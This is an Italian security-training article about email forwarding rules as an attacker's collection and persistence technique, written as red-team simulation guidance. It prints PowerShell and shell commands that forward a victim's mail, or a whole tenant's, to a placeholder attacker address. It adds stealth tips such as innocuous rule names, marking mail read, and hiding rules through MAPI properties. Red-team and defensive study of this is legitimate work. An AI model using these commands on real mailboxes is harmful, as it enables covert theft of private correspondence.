Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Arile! Scopri di più
Le regole di inoltro email rappresentano uno dei meccanismi di persistenza e raccolta dati più sottili a disposizione di un avversario. La tecnica si colloca nella tattica Collection (TA0009), la fase della kill chain in cui l'attaccante raccoglie informazioni di interesse — in questo caso intercettando il flusso di posta elettronica della vittima per estrarre credenziali, documenti riservati e intelligence operativa sull'organizzazione target.
Il principio è semplice quanto efficace: una volta ottenuto l'accesso a una casella di posta (o a un pannello di amministrazione), l'avversario configura una regola che inoltra automaticamente tutti i messaggi — o quelli corrispondenti a criteri specifici — verso un indirizzo sotto il proprio controllo. Il risultato è un canale di esfiltrazione silenzioso che sopravvive anche al reset delle credenziali compromesse, perché la regola resta attiva finché qualcuno non la individua e la rimuove esplicitamente.
La tecnica copre un ventaglio ampio di implementazioni: regole create tramite interfaccia web, client desktop, cmdlet PowerShell, oppure transport rule a livello organizzativo in ambienti Exchange. Alcuni avversari nascondono ulteriormente le regole manipolando le proprietà MAPI, rendendole invisibili ai normali strumenti di amministrazione. Con 5 gruppi APT documentati che impiegano questa tecnica e 4 mitigazioni raccomandate, si tratta di un vettore concreto e attivamente sfruttato.
La simulazione di questa tecnica in un engagement red team richiede l'accesso a una casella di posta compromessa — tipicamente ottenuto tramite phishing, password spraying o abuso di token OAuth. Una volta dentro, il passo successivo è creare la regola di inoltro e verificarne la persistenza dopo un ipotetico reset credenziali.
Scenario Exchange Online / Microsoft 365. Il punto di partenza è la connessione al tenant Exchange Online tramite il modulo PowerShell ufficiale. Dopo l'autenticazione con credenziali compromesse (o token d'accesso):
Connect-ExchangeOnline -UserPrincipalName vittima@dominio.com
Si crea una inbox rule che inoltra tutto verso un indirizzo esterno controllato dall'operatore:
New-InboxRule -Name "RSS Subscription" -ForwardTo attacker@exfil-domain.com -MarkAsRead $true -Mailbox vittima@dominio.com
Il flag -MarkAsRead segna i messaggi come letti, riducendo la probabilità che la vittima noti l'attività. Il nome della regola dovrebbe essere innocuo — "RSS Subscription", "Calendar Sync", "Backup" funzionano bene.
Per simulare lo scenario più aggressivo documentato da LAPSUS$, che ha creato transport rule a livello tenant per catturare tutto il traffico email dell'organizzazione:
New-TransportRule -Name "Journal Archive Rule" -FromScope InOrganization -BlindCopyTo attacker@exfil-domain.com
Questa regola opera a livello organizzativo, intercettando tutti i messaggi interni e in uscita senza toccare le singole mailbox. È estremamente rumorosa ma devastante se non individuata.
Scenario MAPI — regola nascosta. Per replicare la tecnica di occultamento tramite MAPI, lo strumento di riferimento è MFCMAPI (open source), il MAPI Editor di Microsoft disponibile su GitHub. Consente di accedere direttamente al database della mailbox, navigare nella tabella delle regole e modificare le proprietà PR_RULE_MSG_PROVIDER e PR_RULE_ACTIONS per rendere la regola invisibile a Outlook e alla console di amministrazione Exchange.
Scenario Linux — file .forward. Su server che utilizzano MTA tradizionali come Postfix o Sendmail, l'inoltro si configura semplicemente scrivendo un indirizzo nel file .forward nella home directory dell'utente:
echo "attacker@exfil-domain.com" > ~/.forward
Per ambienti con Procmail, la stessa operazione si esegue aggiungendo una ricetta nel file .procmailrc che duplica i messaggi verso l'indirizzo controllato.
Scenario macOS — Apple Mail. Le regole di Apple Mail vengono salvate in file plist sotto la directory ~/Library/Mail. È possibile manipolarle tramite AppleScript o editando direttamente il plist con defaults write o plutil, anche se questo approccio richiede accesso locale alla macchina.
Il tool MailSniper (open source) è utile per enumerare le regole esistenti su mailbox Exchange durante la fase di ricognizione, prima di decidere dove iniettare nuove regole senza sovrapporsi a quelle legittime.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo